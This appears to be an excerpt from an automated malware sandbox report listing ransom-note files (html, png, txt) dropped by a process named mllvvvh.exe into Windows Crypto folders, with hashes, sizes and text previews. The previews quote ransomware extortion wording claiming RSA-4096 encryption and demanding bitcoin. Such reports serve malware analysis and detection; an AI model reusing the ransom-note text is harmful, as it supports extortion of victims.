                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\WindowsAIK\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\WindowsAIK\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\WindowsAIK\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\RSA\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\RSA\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\RSA\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\SystemKeys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\SystemKeys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\SystemKeys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Crypto\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
